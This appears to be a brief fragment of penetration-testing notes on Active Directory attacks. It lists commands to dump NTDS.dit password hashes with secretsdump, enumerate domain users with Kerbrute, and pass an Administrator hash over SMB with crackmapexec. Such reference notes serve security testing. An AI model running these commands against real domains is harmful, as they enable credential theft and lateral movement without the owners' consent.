Requires ntds.dit and requires Registry for SYSTEM and SECURITY hives
secretdump.py -pwd-last-set -user-status -history -ntds ntds.dit -security SECURITY -system SYSTEM local
Kerbrute userenum --dc dc01 -d trg.loc extractedusers.txt
#pass the hash with crackmapexec
crackmapexec smb 10.0.0.1 -u Administrator -H 'Password hash'
Last updated 3 years ago